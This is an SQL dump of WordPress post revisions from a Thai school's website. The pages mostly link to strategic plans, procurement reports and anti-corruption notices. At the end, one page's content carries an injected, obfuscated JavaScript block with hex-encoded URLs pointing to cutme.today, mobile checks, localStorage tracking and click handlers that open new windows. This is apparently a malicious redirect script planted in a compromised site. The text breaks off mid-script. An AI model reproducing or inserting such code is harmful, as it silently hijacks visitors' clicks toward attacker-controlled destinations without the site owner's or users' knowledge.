(1707,1,'2025-07-05 14:50:24','2025-07-05 07:50:24','<!-- wp:image {\"id\":1705,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/Is-It-a-Gift-Instagram-Post-2-1024x256.png\" alt=\"\" class=\"wp-image-1705\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:file {\"id\":1706,\"href\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/แผนกลยุทธ์หรือแผนพัฒนาคุณภาพการศึกษาของสถานศึกษา.pdf\",\"displayPreview\":true} -->\n<div class=\"wp-block-file\"><object class=\"wp-block-file__embed\" data=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/แผนกลยุทธ์หรือแผนพัฒนาคุณภาพการศึกษาของสถานศึกษา.pdf\" type=\"application/pdf\" style=\"width:100%;height:600px\" aria-label=\"แผนกลยุทธ์หรือแผนพัฒนาคุณภาพการศึกษาของสถานศึกษา\"></object><a id=\"wp-block-file--media-67c96f33-a0c3-429f-b91c-3d6cfea2e810\" href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/แผนกลยุทธ์หรือแผนพัฒนาคุณภาพการศึกษาของสถานศึกษา.pdf\">แผนกลยุทธ์หรือแผนพัฒนาคุณภาพการศึกษาของสถานศึกษา</a><a href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/แผนกลยุทธ์หรือแผนพัฒนาคุณภาพการศึกษาของสถานศึกษา.pdf\" class=\"wp-block-file__button wp-element-button\" download aria-describedby=\"wp-block-file--media-67c96f33-a0c3-429f-b91c-3d6cfea2e810\">Download</a></div>\n<!-- /wp:file -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->','แผนกลยุทธ์หรือแผนพัฒนาคุณภาพการศึกษาของสถานศึกษา','','inherit','closed','closed','','1704-revision-v1','','','2025-07-05 14:50:24','2025-07-05 07:50:24','',1704,'http://pakhaeng.ssk.in.th/?p=1707',0,'revision','',0),
(1708,1,'2025-07-05 14:50:26','2025-07-05 07:50:26','<!-- wp:image {\"id\":1705,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/Is-It-a-Gift-Instagram-Post-2-1024x256.png\" alt=\"\" class=\"wp-image-1705\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:file {\"id\":1706,\"href\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/แผนกลยุทธ์หรือแผนพัฒนาคุณภาพการศึกษาของสถานศึกษา.pdf\",\"displayPreview\":true} -->\n<div class=\"wp-block-file\"><object class=\"wp-block-file__embed\" data=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/แผนกลยุทธ์หรือแผนพัฒนาคุณภาพการศึกษาของสถานศึกษา.pdf\" type=\"application/pdf\" style=\"width:100%;height:600px\" aria-label=\"แผนกลยุทธ์หรือแผนพัฒนาคุณภาพการศึกษาของสถานศึกษา\"></object><a id=\"wp-block-file--media-67c96f33-a0c3-429f-b91c-3d6cfea2e810\" href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/แผนกลยุทธ์หรือแผนพัฒนาคุณภาพการศึกษาของสถานศึกษา.pdf\">แผนกลยุทธ์หรือแผนพัฒนาคุณภาพการศึกษาของสถานศึกษา</a><a href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/แผนกลยุทธ์หรือแผนพัฒนาคุณภาพการศึกษาของสถานศึกษา.pdf\" class=\"wp-block-file__button wp-element-button\" download aria-describedby=\"wp-block-file--media-67c96f33-a0c3-429f-b91c-3d6cfea2e810\">Download</a></div>\n<!-- /wp:file -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->','แผนกลยุทธ์หรือแผนพัฒนาคุณภาพการศึกษาของสถานศึกษา','','inherit','closed','closed','','1704-revision-v1','','','2025-07-05 14:50:26','2025-07-05 07:50:26','',1704,'http://pakhaeng.ssk.in.th/?p=1708',0,'revision','',0),
(1709,1,'2025-07-05 14:50:51','2025-07-05 07:50:51','<!-- wp:generateblocks/image {\"uniqueId\":\"285d6904\",\"mediaId\":1259,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-285d6904\"><img class=\"gb-image gb-image-285d6904\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/2025.png\" alt=\"\" title=\"2025\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f5e8d6af\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:kadence/tabs {\"uniqueID\":\"871_e416be-74\",\"tabCount\":7,\"currentTab\":2,\"contentBgColor\":\"var(\\u002d\\u002dglobal-palette9, #ffffff)\",\"contentBorderStyles\":[{\"top\":[\"#0a6689\",\"\",3],\"right\":[\"#0a6689\",\"\",0],\"bottom\":[\"#0a6689\",\"\",0],\"left\":[\"#0a6689\",\"\",0],\"unit\":\"px\"}],\"titles\":[{\"text\":\"ข้อมูลพื้นฐาน\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"\\u003cstrong\\u003eการบริหารงานและการใช้จ่ายงบประมาณ\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"\\u003cstrong\\u003eการจัดซื้อจัดจ้าง\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"\\u003cstrong\\u003eการบริหารและพัฒนาทรัพยากรบุคคล\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\"},{\"text\":\"\\u003cstrong\\u003eการส่งเสริมความโปร่งใส\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\"},{\"text\":\"\\u003cstrong\\u003eการดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\"},{\"text\":\"\\u003cstrong\\u003eการส่งเสริมคุณธรรมและความโปร่งใส\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\"}],\"iSize\":16,\"titleColor\":\"#000000\",\"titleColorHover\":\"#ffffff\",\"titleColorActive\":\"#ffffff\",\"titleBg\":\"#f78da7\",\"titleBgHover\":\"#cf2e2e\",\"titleBgActive\":\"#cf2e2e\",\"titleBorder\":\"#ffffff\",\"titleBorderHover\":\"#f78da7\",\"titleBorderActive\":\"var(\\u002d\\u002dglobal-palette7, #eeeeee)\",\"titleBorderWidth\":[0,0,0,0],\"titleBorderRadius\":[4,4,0,0],\"titlePadding\":[8,20,8,20],\"titleMargin\":[0,8,0,0],\"sizeType\":\"em\",\"lineHeight\":1.4,\"lineType\":\"em\",\"fontWeight\":\"bold\",\"verticalTabWidth\":[38,\"\",\"\"]} -->\n<div class=\"wp-block-kadence-tabs alignnone\"><div class=\"kt-tabs-wrap kt-tabs-id871_e416be-74 kt-tabs-has-7-tabs kt-active-tab-2 kt-tabs-layout-tabs kt-tabs-tablet-layout-inherit kt-tabs-mobile-layout-inherit kt-tab-alignment-left \"><ul class=\"kt-tabs-title-list\"><li id=\"tab-\" class=\"kt-title-item kt-title-item-1 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-\" data-tab=\"1\" class=\"kt-tab-title kt-tab-title-1 \"><span class=\"kt-title-text\">ข้อมูลพื้นฐาน</span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-2 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-active\"><a href=\"#tab-strongstrong\" data-tab=\"2\" class=\"kt-tab-title kt-tab-title-2 \"><span class=\"kt-title-text\"><strong>การบริหารงานและการใช้จ่ายงบประมาณ</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-3 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"3\" class=\"kt-tab-title kt-tab-title-3 \"><span class=\"kt-title-text\"><strong>การจัดซื้อจัดจ้าง</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-4 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"4\" class=\"kt-tab-title kt-tab-title-4 \"><span class=\"kt-title-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-5 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"5\" class=\"kt-tab-title kt-tab-title-5 \"><span class=\"kt-title-text\"><strong>การส่งเสริมความโปร่งใส</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-6 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"6\" class=\"kt-tab-title kt-tab-title-6 \"><span class=\"kt-title-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-7 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"7\" class=\"kt-tab-title kt-tab-title-7 \"><span class=\"kt-title-text\"><strong>การส่งเสริมคุณธรรมและความโปร่งใส</strong></span></a></li></ul><div class=\"kt-tabs-content-wrap\"><!-- wp:kadence/tab {\"uniqueID\":\"cda4f9-0b\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-1 kt-inner-tabcda4f9-0b\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_f98827-df\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_f98827-df kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_d803ff-d2\",\"width\":4,\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_d803ff-d2\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=546\">โครงสร้างและอำนาจหน้าที่</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_921bc2-5c\",\"width\":4,\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_921bc2-5c\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=469↗\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_77fcfe-f3\",\"width\":4,\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_77fcfe-f3\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=362\">ข้อมูลการติดต่อ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_e9af1d-e0\",\"size\":16,\"width\":4,\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_e9af1d-e0\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=355\">ข่าวประชาสัมพันธ์</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":2,\"uniqueID\":\"e71bc9-b1\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-2 kt-inner-tabe71bc9-b1\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_8bd340-cd\",\"color\":\"#0693e3\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_8bd340-cd kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_eb7e47-e1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_eb7e47-e1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1704\">แผนกลยุทธ์หรือแผนพัฒนาคุณภาพการศึกษาของสถานศึกษา</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_cdf90d-2f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_cdf90d-2f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">แผนปฏิบัติการและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_da22bc-41\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_da22bc-41\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=784\">คู่มือหรือแนวทางปฏิบัติงานของครู และบุคลากรทางการศึกษา</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_b2d0c3-79\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_b2d0c3-79\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=459\">E-Service</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":3,\"uniqueID\":\"bab0c3-88\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-3 kt-inner-tabbab0c3-88\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_948636-84\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_948636-84 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_3edff3-bb\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_3edff3-bb\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1558\">รายการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุและความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ ประจำปีงบประมาณ พ.ศ .2568</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_9ab5d8-54\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_9ab5d8-54\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1571\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี งบประมาณ พ.ศ .2567</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":4,\"uniqueID\":\"942a96-06\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-4 kt-inner-tab942a96-06\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_37f8e2-2d\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_37f8e2-2d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_12bed0-a6\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_12bed0-a6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=566\" data-type=\"page\" data-id=\"566\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_7e4f7d-a0\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_7e4f7d-a0\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1502\" data-type=\"page\" data-id=\"1003\">ประมวลจริยธรรม และการขับเคลื่อนจริยธรรม</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":5,\"uniqueID\":\"42916d-7b\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-5 kt-inner-tab42916d-7b\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_25468b-f6\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_25468b-f6 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_ae038f-10\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_ae038f-10\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=712\" data-type=\"page\" data-id=\"712\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_667e50-fd\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_667e50-fd\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=476\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":6,\"uniqueID\":\"357ff8-b0\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-6 kt-inner-tab357ff8-b0\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_363bba-05\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_363bba-05 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_c0e085-63\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_c0e085-63\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=859\" data-type=\"page\" data-id=\"859\">ประกาศเจตนารมณ์และการสร้างวัฒนธรรม ตามนโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_29fead-8e\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_29fead-8e\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1032\">การประเมินความเสี่ยงที่อาจเกิดการให้หรือรับสินบนจากการดำเนินงานตามภารกิจของสถานศึกษา  ประจำปีงบประมาณ พ.ศ .2568</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":7,\"uniqueID\":\"77d9b7-d1\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-7 kt-inner-tab77d9b7-d1\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_c6c267-89\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_c6c267-89 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_64d6b5-67\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_64d6b5-67\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1697\" data-type=\"page\" data-id=\"1010\">แนวทาง/โครงการ/กิจกรรมการป้องกันการทุจริต</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_106c4d-48\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_106c4d-48\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1594\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในสถานศึกษา</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab --></div></div></div>\n<!-- /wp:kadence/tabs --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns -->\n<!-- /wp:generateblocks/container -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const 